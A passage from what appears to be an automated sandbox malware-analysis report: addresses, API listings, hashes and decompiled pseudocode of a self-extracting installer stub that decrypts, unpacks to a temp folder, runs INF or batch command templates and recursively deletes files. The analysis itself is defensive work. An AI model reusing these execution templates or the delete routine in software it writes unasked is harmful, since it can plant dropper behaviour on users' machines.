                                                                                                                                                                                                                                            0x00321d76
                                                                                                                                                                                                                                            0x00321d78
                                                                                                                                                                                                                                            0x00321d7f
                                                                                                                                                                                                                                            0x00321e05
                                                                                                                                                                                                                                            0x00321e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321e12
                                                                                                                                                                                                                                            0x00321e1b
                                                                                                                                                                                                                                            0x00321e73
                                                                                                                                                                                                                                            0x00321e21
                                                                                                                                                                                                                                            0x00321e21
                                                                                                                                                                                                                                            0x00321e28
                                                                                                                                                                                                                                            0x00321e37
                                                                                                                                                                                                                                            0x00321e3e
                                                                                                                                                                                                                                            0x00321e52
                                                                                                                                                                                                                                            0x00321e60
                                                                                                                                                                                                                                            0x00321e60
                                                                                                                                                                                                                                            0x00321e3e
                                                                                                                                                                                                                                            0x00321e79
                                                                                                                                                                                                                                            0x00321e7b
                                                                                                                                                                                                                                            0x00321e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321d9b
                                                                                                                                                                                                                                            0x00321d9b
                                                                                                                                                                                                                                            0x00321da0
                                                                                                                                                                                                                                            0x00321da2
                                                                                                                                                                                                                                            0x00321da5
                                                                                                                                                                                                                                            0x00321da5
                                                                                                                                                                                                                                            0x00321da7
                                                                                                                                                                                                                                            0x00321da8
                                                                                                                                                                                                                                            0x00321dac
                                                                                                                                                                                                                                            0x00321dae
                                                                                                                                                                                                                                            0x00321db4
                                                                                                                                                                                                                                            0x00321db7
                                                                                                                                                                                                                                            0x00321db7
                                                                                                                                                                                                                                            0x00321db9
                                                                                                                                                                                                                                            0x00321dba
                                                                                                                                                                                                                                            0x00321dbe
                                                                                                                                                                                                                                            0x00321dc3
                                                                                                                                                                                                                                            0x00321dce
                                                                                                                                                                                                                                            0x00321dd2
                                                                                                                                                                                                                                            0x00321deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321dd2
                                                                                                                                                                                                                                            0x00321bf7
                                                                                                                                                                                                                                            0x00321bfe
                                                                                                                                                                                                                                            0x00321c07
                                                                                                                                                                                                                                            0x00321d55
                                                                                                                                                                                                                                            0x00321d5a
                                                                                                                                                                                                                                            0x00321d5b
                                                                                                                                                                                                                                            0x00321d5d
                                                                                                                                                                                                                                            0x00321d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321c1b
                                                                                                                                                                                                                                            0x00321c1b
                                                                                                                                                                                                                                            0x00321c20
                                                                                                                                                                                                                                            0x00321c2c
                                                                                                                                                                                                                                            0x00321c33
                                                                                                                                                                                                                                            0x00321c38
                                                                                                                                                                                                                                            0x00321c3a
                                                                                                                                                                                                                                            0x00321c3a
                                                                                                                                                                                                                                            0x00321c40
                                                                                                                                                                                                                                            0x00321c4b
                                                                                                                                                                                                                                            0x00321c4b
                                                                                                                                                                                                                                            0x00321c5d
                                                                                                                                                                                                                                            0x00321c61
                                                                                                                                                                                                                                            0x00321dd4
                                                                                                                                                                                                                                            0x00321dd4
                                                                                                                                                                                                                                            0x00321dd6
                                                                                                                                                                                                                                            0x00321ddb
                                                                                                                                                                                                                                            0x00321ddc
                                                                                                                                                                                                                                            0x00321dde
                                                                                                                                                                                                                                            0x00321d64
                                                                                                                                                                                                                                            0x00321d64
                                                                                                                                                                                                                                            0x00321d67
                                                                                                                                                                                                                                            0x00321d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00321c67
                                                                                                                                                                                                                                            0x00321c67
                                                                                                                                                                                                                                            0x00321c6d
                                                                                                                                                                                                                                            0x00321c72
                                                                                                                                                                                                                                            0x00321c74
                                                                                                                                                                                                                                            0x00321c74
                                                                                                                                                                                                                                            0x00321c8e
                                                                                                                                                                                                                                            0x00321c99
                                                                                                                                                                                                                                            0x00321cc0
                                                                                                                                                                                                                                            0x00321cf8
                                                                                                                                                                                                                                            0x00321d07
                                                                                                                                                                                                                                            0x00321d23
                                                                                                                                                                                                                                            0x00321d09
                                                                                                                                                                                                                                            0x00321d14
                                                                                                                                                                                                                                            0x00321d1b
                                                                                                                                                                                                                                            0x00321d1b
                                                                                                                                                                                                                                            0x00321d2b
                                                                                                                                                                                                                                            0x00321d2d
                                                                                                                                                                                                                                            0x00321d2d
                                                                                                                                                                                                                                            0x00321d38
                                                                                                                                                                                                                                            0x00321d39
                                                                                                                                                                                                                                            0x00321d46
                                                                                                                                                                                                                                            0x00321cc2
                                                                                                                                                                                                                                            0x00321cc2
                                                                                                                                                                                                                                            0x00321ccc
                                                                                                                                                                                                                                            0x00321cce
                                                                                                                                                                                                                                            0x00321cce
                                                                                                                                                                                                                                            0x00321cdb
                                                                                                                                                                                                                                            0x00321ce6
                                                                                                                                                                                                                                            0x00321cee
                                                                                                                                                                                                                                            0x00321cee
                                                                                                                                                                                                                                            0x00321e89
                                                                                                                                                                                                                                            0x00321e91
                                                                                                                                                                                                                                            0x00321e92
                                                                                                                                                                                                                                            0x00321e94
                                                                                                                                                                                                                                            0x00321e97
                                                                                                                                                                                                                                            0x00321ea4
                                                                                                                                                                                                                                            0x00321ea4
                                                                                                                                                                                                                                            0x00321c61
                                                                                                                                                                                                                                            0x00321c07
                                                                                                                                                                                                                                            0x00321bd3
                                                                                                                                                                                                                                            0x00321b7b

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00321BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00321BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00321C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00321C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00321140,00000000,00000008,?), ref: 00321CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00321D1B
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-2145762761
                                                                                                                                                                                                                                            • Opcode ID: 5b274f0e5e1050f70053c26da397a6037ed388dbbca7944c466db81a238d9571
                                                                                                                                                                                                                                            • Instruction ID: 266dc4843170e3023eafc2fbf44388995f06139efee60d72cea991e9f3659c52
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b274f0e5e1050f70053c26da397a6037ed388dbbca7944c466db81a238d9571
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74A17C70A00238ABEB339B24FE45FFA776D9B71310F154299E455A72C0DBB09E86CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 450 322f1d-322f3d 451 322f3f-322f46 450->451 452 322f6c-322f73 call 325164 450->452 454 322f48 call 3251e5 451->454 455 322f5f-322f66 call 323a3f 451->455 460 323041 452->460 461 322f79-322f80 call 3255a0 452->461 462 322f4d-322f4f 454->462 455->452 455->460 464 323043-323053 call 326ce0 460->464 461->460 468 322f86-322fbe GetSystemDirectoryA call 32658a LoadLibraryA 461->468 462->460 465 322f55-322f5d 462->465 465->452 465->455 472 322fc0-322fd4 GetProcAddress 468->472 473 322ff7-323004 FreeLibrary 468->473 472->473 476 322fd6-322fee DecryptFileA 472->476 474 323006-32300c 473->474 475 323017-323024 SetCurrentDirectoryA 473->475 474->475 477 32300e call 32621e 474->477 478 323026-32303c call 3244b9 call 326285 475->478 479 323054-32305a 475->479 476->473 490 322ff0-322ff5 476->490 488 323013-323015 477->488 478->460 480 323065-32306c 479->480 481 32305c call 323b26 479->481 486 32306e-323075 call 32256d 480->486 487 32307c-323089 480->487 491 323061-323063 481->491 496 32307a 486->496 493 3230a1-3230a9 487->493 494 32308b-323091 487->494 488->460 488->475 490->473 491->460 491->480 499 3230b4-3230b7 493->499 500 3230ab-3230ad 493->500 494->493 497 323093 call 323ba2 494->497 496->487 504 323098-32309a 497->504 499->464 500->499 502 3230af call 324169 500->502 502->499 504->460 505 32309c 504->505 505->493
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00322F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0x328a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E00325164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E00326CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E003255A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E0032658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0x32a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0x328a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0x328a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0x328d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0x328d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t41 =  *0x329a40; // 0x3, executed
                                                                                                                                                                                                                                            										_t26 = E0032256D(_t41); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0x328a24; // 0x0
                                                                                                                                                                                                                                            									 *0x329a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0x328a38;
                                                                                                                                                                                                                                            										if( *0x328a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E00324169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0x329a30 - _t22; // 0x0
                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E00323BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0x328a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E00323B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E003244B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0x329124 = E00326285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t59 =  *0x329a30 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E0032621E(); // executed
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0x328a24;
                                                                                                                                                                                                                                            				if( *0x328a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E00323A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E003251E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0x328a38;
                                                                                                                                                                                                                                            				if( *0x328a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00322f1d
                                                                                                                                                                                                                                            0x00322f28
                                                                                                                                                                                                                                            0x00322f2f
                                                                                                                                                                                                                                            0x00322f3d
                                                                                                                                                                                                                                            0x00322f6c
                                                                                                                                                                                                                                            0x00322f6c
                                                                                                                                                                                                                                            0x00322f71
                                                                                                                                                                                                                                            0x00322f73
                                                                                                                                                                                                                                            0x00323041
                                                                                                                                                                                                                                            0x00323041
                                                                                                                                                                                                                                            0x00323043
                                                                                                                                                                                                                                            0x00323053
                                                                                                                                                                                                                                            0x00323053
                                                                                                                                                                                                                                            0x00322f79
                                                                                                                                                                                                                                            0x00322f80
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322f86
                                                                                                                                                                                                                                            0x00322f86
                                                                                                                                                                                                                                            0x00322f93
                                                                                                                                                                                                                                            0x00322f9e
                                                                                                                                                                                                                                            0x00322fa0
                                                                                                                                                                                                                                            0x00322fa6
                                                                                                                                                                                                                                            0x00322fb8
                                                                                                                                                                                                                                            0x00322fba
                                                                                                                                                                                                                                            0x00322fbe
                                                                                                                                                                                                                                            0x00322fc6
                                                                                                                                                                                                                                            0x00322fcc
                                                                                                                                                                                                                                            0x00322fd4
                                                                                                                                                                                                                                            0x00322fd6
                                                                                                                                                                                                                                            0x00322fd8
                                                                                                                                                                                                                                            0x00322fe0
                                                                                                                                                                                                                                            0x00322fe6
                                                                                                                                                                                                                                            0x00322fee
                                                                                                                                                                                                                                            0x00322ff0
                                                                                                                                                                                                                                            0x00322ff5
                                                                                                                                                                                                                                            0x00322ff5
                                                                                                                                                                                                                                            0x00322fee
                                                                                                                                                                                                                                            0x00322fd4
                                                                                                                                                                                                                                            0x00322ff8
                                                                                                                                                                                                                                            0x00322ffe
                                                                                                                                                                                                                                            0x00323004
                                                                                                                                                                                                                                            0x00323017
                                                                                                                                                                                                                                            0x0032301c
                                                                                                                                                                                                                                            0x00323024
                                                                                                                                                                                                                                            0x00323054
                                                                                                                                                                                                                                            0x0032305a
                                                                                                                                                                                                                                            0x00323065
                                                                                                                                                                                                                                            0x00323065
                                                                                                                                                                                                                                            0x0032306c
                                                                                                                                                                                                                                            0x0032306e
                                                                                                                                                                                                                                            0x00323075
                                                                                                                                                                                                                                            0x0032307a
                                                                                                                                                                                                                                            0x0032307a
                                                                                                                                                                                                                                            0x0032307c
                                                                                                                                                                                                                                            0x00323081
                                                                                                                                                                                                                                            0x00323087
                                                                                                                                                                                                                                            0x00323089
                                                                                                                                                                                                                                            0x003230a1
                                                                                                                                                                                                                                            0x003230a1
                                                                                                                                                                                                                                            0x003230a9
                                                                                                                                                                                                                                            0x003230ab
                                                                                                                                                                                                                                            0x003230ad
                                                                                                                                                                                                                                            0x003230af
                                                                                                                                                                                                                                            0x003230af
                                                                                                                                                                                                                                            0x003230ad
                                                                                                                                                                                                                                            0x003230b6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032308b
                                                                                                                                                                                                                                            0x0032308b
                                                                                                                                                                                                                                            0x00323091
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323093
                                                                                                                                                                                                                                            0x00323098
                                                                                                                                                                                                                                            0x0032309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032309c
                                                                                                                                                                                                                                            0x00323089
                                                                                                                                                                                                                                            0x0032305c
                                                                                                                                                                                                                                            0x00323061
                                                                                                                                                                                                                                            0x00323063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323063
                                                                                                                                                                                                                                            0x0032302b
                                                                                                                                                                                                                                            0x00323032
                                                                                                                                                                                                                                            0x0032303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032303c
                                                                                                                                                                                                                                            0x00323006
                                                                                                                                                                                                                                            0x0032300c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032300e
                                                                                                                                                                                                                                            0x00323015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323015
                                                                                                                                                                                                                                            0x00322f80
                                                                                                                                                                                                                                            0x00322f3f
                                                                                                                                                                                                                                            0x00322f46
                                                                                                                                                                                                                                            0x00322f5f
                                                                                                                                                                                                                                            0x00322f5f
                                                                                                                                                                                                                                            0x00322f64
                                                                                                                                                                                                                                            0x00322f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322f66
                                                                                                                                                                                                                                            0x00322f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322f55
                                                                                                                                                                                                                                            0x00322f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00322F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00322FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00322FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00322FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00322FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0032301C
                                                                                                                                                                                                                                              • Part of subcall function 003251E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00322F4D,?,00000002,00000000), ref: 00325201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-4070797333
                                                                                                                                                                                                                                            • Opcode ID: 4308a4caaaa93d509062ab6e818bfae4469f77874328b0158c8b41ee37bd9e8a
                                                                                                                                                                                                                                            • Instruction ID: 9ae0ad7cde5f9ff6834651a897684a3a4055ae3211132c21dde97c490d487885
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4308a4caaaa93d509062ab6e818bfae4469f77874328b0158c8b41ee37bd9e8a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F241C630A017359BDB33AB71BD4676A33ACDB54750F11806EE942D6191EF78CE82CA71
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00322390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E00326CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00321680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E003216B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E00321680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E003216B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E003216B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E0032658A( &_v280, 0x104, 0x321140);
                                                                                                                                                                                                                                            								E00322390( &_v284);
                                                                                                                                                                                                                                            							}
